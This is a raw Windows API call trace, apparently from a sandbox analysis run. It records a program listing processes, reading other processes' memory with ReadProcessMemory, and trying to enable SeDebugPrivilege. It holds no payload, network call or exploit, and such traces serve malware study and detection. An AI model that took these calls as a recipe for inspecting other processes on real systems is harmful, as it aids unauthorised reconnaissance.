[0406.150] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.172] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8d0) returned 0x0
[0406.172] CloseHandle (hObject=0x0) returned 0
[0406.174] _ui64tow (_Value=0xdd4, _Buffer="2256", _Radix=10) returned="3540"
[0406.182] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3540") returned 4
[0406.183] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.183] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.209] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdd4) returned 0x240
[0406.209] GetLastError () returned 0x0
[0406.209] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.209] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.209] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.209] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b28e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.210] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b26ca, lpBuffer=0x12dd100, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.211] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.212] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.212] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.212] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.213] malloc (_Size=0xe0) returned 0x2c4740
[0406.213] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x3b2702, lpBuffer=0x2c4740, nSize=0xde, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0406.213] free (_Block=0x2c4740)
[0406.214] CloseHandle (hObject=0x240) returned 1
[0406.215] _ui64tow (_Value=0xdbc, _Buffer="3540", _Radix=10) returned="3516"
[0406.219] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3516") returned 4
[0406.224] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.224] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.255] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdbc) returned 0x240
[0406.255] GetLastError () returned 0x0
[0406.255] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.255] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.255] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.256] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e2340, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.256] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e215a, lpBuffer=0x12dd100, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.257] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.258] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.258] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffd8020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.259] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e1990, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.259] malloc (_Size=0xe8) returned 0x2c4740
[0406.259] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x1e219a, lpBuffer=0x2c4740, nSize=0xe6, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c4740*, lpNumberOfBytesRead=0x0) returned 1
[0406.259] free (_Block=0x2c4740)
[0406.260] CloseHandle (hObject=0x240) returned 1
[0406.261] _ui64tow (_Value=0xdec, _Buffer="3516", _Radix=10) returned="3564"
[0406.266] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3564") returned 4
[0406.267] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x124398, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.267] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.294] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xdec) returned 0x240
[0406.294] GetLastError () returned 0x0
[0406.299] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.299] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.299] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.300] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2428c0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.300] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2426d4, lpBuffer=0x12dd100, nSize=0x44, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.301] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.302] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.302] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.302] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x241ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.303] malloc (_Size=0x74) returned 0x2c1300
[0406.303] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x242718, lpBuffer=0x2c1300, nSize=0x72, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2c1300*, lpNumberOfBytesRead=0x0) returned 1
[0406.303] free (_Block=0x2c1300)
[0406.304] CloseHandle (hObject=0x240) returned 1
[0406.305] _ui64tow (_Value=0xde8, _Buffer="3564", _Radix=10) returned="3560"
[0406.309] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="3560") returned 4
[0406.311] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0406.311] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0406.338] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xde8) returned 0x240
[0406.338] GetLastError () returned 0x0
[0406.338] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd390, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd390, ReturnLength=0x0) returned 0x0
[0406.338] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd018, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.339] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x779b2660, lpBuffer=0x12dd4d8, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4d8*, lpNumberOfBytesRead=0x0) returned 1
[0406.339] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b27e0, lpBuffer=0x12dd3c0, nSize=0xe0, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd3c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.339] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b26c8, lpBuffer=0x12dd100, nSize=0x3a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd100*, lpNumberOfBytesRead=0x0) returned 1
[0406.340] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x1, ProcessInformation=0x12dd528, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd528, ReturnLength=0x0) returned 0x0
[0406.341] NtQueryInformationProcess (in: ProcessHandle=0x240, ProcessInformationClass=0x0, ProcessInformation=0x12dd070, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x12dd070, ReturnLength=0x0) returned 0x0
[0406.342] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x7fffffdd020, lpBuffer=0x12dd4c0, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd4c0*, lpNumberOfBytesRead=0x0) returned 1
[0406.342] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b1ea0, lpBuffer=0x12dd0a0, nSize=0x400, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12dd0a0*, lpNumberOfBytesRead=0x0) returned 1
[0406.342] malloc (_Size=0x10) returned 0x2beee0
[0406.342] ReadProcessMemory (in: hProcess=0x240, lpBaseAddress=0x2b2702, lpBuffer=0x2beee0, nSize=0xe, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x2beee0*, lpNumberOfBytesRead=0x0) returned 1
[0406.342] free (_Block=0x2beee0)
[0406.343] CloseHandle (hObject=0x240) returned 1
[0406.344] free (_Block=0x2c9a30)
[0406.344] malloc (_Size=0x48) returned 0x2bd400
[0406.344] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12dd918 | out: lpSystemTimeAsFileTime=0x12dd918*(dwLowDateTime=0x9e39340, dwHighDateTime=0x1dab599))
[0406.344] SetEvent (hEvent=0x1f8) returned 1
[0406.360] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x4) returned 0x15da80
[0406.360] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x15da80, pulNumLanguages=0x12de480 | out: pulNumLanguages=0x12de480) returned 1
[0406.360] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da80 | out: hHeap=0x120000) returned 1
[0410.794] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UEAAKXZ () returned 0x2
[0410.813] SetLastError (dwErrCode=0x0)
[0410.813] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x12de390) returned 1
[0410.813] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da90
[0410.813] SetLastError (dwErrCode=0x0)
[0410.813] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da90, pcchLanguagesBuffer=0x12de390 | out: pulNumLanguages=0x12de488, pwszLanguagesBuffer=0x15da90, pcchLanguagesBuffer=0x12de390) returned 1
[0410.813] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x8) returned 0x15da80
[0410.813] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x15da90 | out: hHeap=0x120000) returned 1
[0410.813] RtlAllocateHeap (HeapHandle=0x120000, Flags=0x0, Size=0x14) returned 0x196160
[0410.814] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x196160, pulNumLanguages=0x12de488 | out: pulNumLanguages=0x12de488) returned 1
[0410.814] HeapFree (in: hHeap=0x120000, dwFlags=0x0, lpMem=0x196160 | out: hHeap=0x120000) returned 1
[0410.817] SafeArrayGetElemsize (psa=0x1b0710) returned 0x8
[0410.818] SafeArrayPutElement (psa=0x1b0710, rgIndices=0x12ddcc0, pv=0x1c5fd8) returned 0x0
[0410.818] SafeArrayRedim (in: psa=0x1b0710, psaboundNew=0x12ddcd8 | out: psa=0x1b0710) returned 0x0
[0410.818] SafeArrayCopy (in: psa=0x1b0710, ppsaOut=0x12ddc20 | out: ppsaOut=0x12ddc20) returned 0x0
[0410.820] SetEvent (hEvent=0x1f8) returned 1
[0410.820] free (_Block=0x2bd400)
[0410.820] GetCurrentThread () returned 0xfffffffffffffffe
[0410.820] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0x12dda78 | out: TokenHandle=0x12dda78*=0x24c) returned 1
[0410.820] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x12dda54 | out: lpLuid=0x12dda54*(LowPart=0x14, HighPart=0)) returned 1
[0410.822] SetLastError (dwErrCode=0x0)
[0410.822] AdjustTokenPrivileges (in: TokenHandle=0x24c, DisableAllPrivileges=0, NewState=0x12dda50*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
[0410.822] GetLastError () returned 0x514
[0410.822] CloseHandle (hObject=0x24c) returned 1
[0410.823] malloc (_Size=0x18) returned 0x2bef20
[0410.823] SafeArrayPutElement (psa=0x1b0250, rgIndices=0x12ddaf8, pv=0x1b0188) returned 0x0
[0410.823] SafeArrayPutElement (psa=0x1b0150, rgIndices=0x12ddaf8, pv=0x1b0188) returned 0x0
[0410.823] free (_Block=0x2bef20)
[0410.823] malloc (_Size=0x8000) returned 0x2e6250
[0410.824] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e6250, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0x2e6250, ResultLength=0x0) returned 0xc0000004
[0410.831] free (_Block=0x2e6250)
[0410.831] malloc (_Size=0x10000) returned 0x2e6250
[0410.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2e6250, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x2e6250, ResultLength=0x0) returned 0xc0000004
[0410.833] free (_Block=0x2e6250)
[0410.833] malloc (_Size=0x18000) returned 0x2c9220
[0410.833] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2c9220, Length=0x18000, ResultLength=0x0 | out: SystemInformation=0x2c9220, ResultLength=0x0) returned 0x0
[0410.834] _ui64tow (_Value=0x0, _Buffer="", _Radix=10) returned="0"
[0410.839] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="0") returned 1
[0410.840] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x9a001882, szCSDVersion="") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.840] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.855] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0
[0410.855] CloseHandle (hObject=0x0) returned 0
[0410.856] _ui64tow (_Value=0x4, _Buffer="0", _Radix=10) returned="4"
[0410.860] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="4") returned 1
[0410.862] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.862] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.893] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0
[0410.893] CloseHandle (hObject=0x0) returned 0
[0410.895] _ui64tow (_Value=0x10c, _Buffer="4", _Radix=10) returned="268"
[0410.902] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="268") returned 3
[0410.903] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.903] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.926] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10c) returned 0x0
[0410.926] CloseHandle (hObject=0x0) returned 0
[0410.927] _ui64tow (_Value=0x154, _Buffer="268", _Radix=10) returned="340"
[0410.932] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="340") returned 3
[0410.933] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.933] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.955] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x154) returned 0x0
[0410.955] CloseHandle (hObject=0x0) returned 0
[0410.956] _ui64tow (_Value=0x178, _Buffer="340", _Radix=10) returned="376"
[0410.960] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="376") returned 3
[0410.961] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243f4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.962] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0410.982] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x178) returned 0x0
[0410.982] CloseHandle (hObject=0x0) returned 0
[0410.983] _ui64tow (_Value=0x184, _Buffer="376", _Radix=10) returned="388"
[0410.987] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="388") returned 3
[0410.988] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0410.988] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.009] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x184) returned 0x0
[0411.009] CloseHandle (hObject=0x0) returned 0
[0411.010] _ui64tow (_Value=0x1ac, _Buffer="388", _Radix=10) returned="428"
[0411.015] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="428") returned 3
[0411.016] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1243a4, dwBuildNumber=0x0, dwPlatformId=0x2, szCSDVersion="Service Pa䍐\x12") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.016] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.040] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0
[0411.041] CloseHandle (hObject=0x0) returned 0
[0411.042] _ui64tow (_Value=0x1d8, _Buffer="428", _Radix=10) returned="472"
[0411.050] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="472") returned 3
[0411.051] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.051] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.071] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0
[0411.071] CloseHandle (hObject=0x0) returned 0
[0411.072] _ui64tow (_Value=0x1e0, _Buffer="472", _Radix=10) returned="480"
[0411.076] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="480") returned 3
[0411.077] GetVersionExW (in: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1") | out: lpVersionInformation=0x12dd560*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0411.077] _vsnwprintf (in: _Buffer=0x12dd890, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x12dd4d8 | out: _Buffer="6.1.7601") returned 8
[0411.097] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0
[0411.097] CloseHandle (hObject=0x0) returned 0
[0411.098] _ui64tow (_Value=0x1e8, _Buffer="480", _Radix=10) returned="488"
[0411.102] _vsnwprintf (in: _Buffer=0x12dd680, _BufferCount=0x103, _Format="%lu", _ArgList=0x12dd4d8 | out: _Buffer="488") returned 3
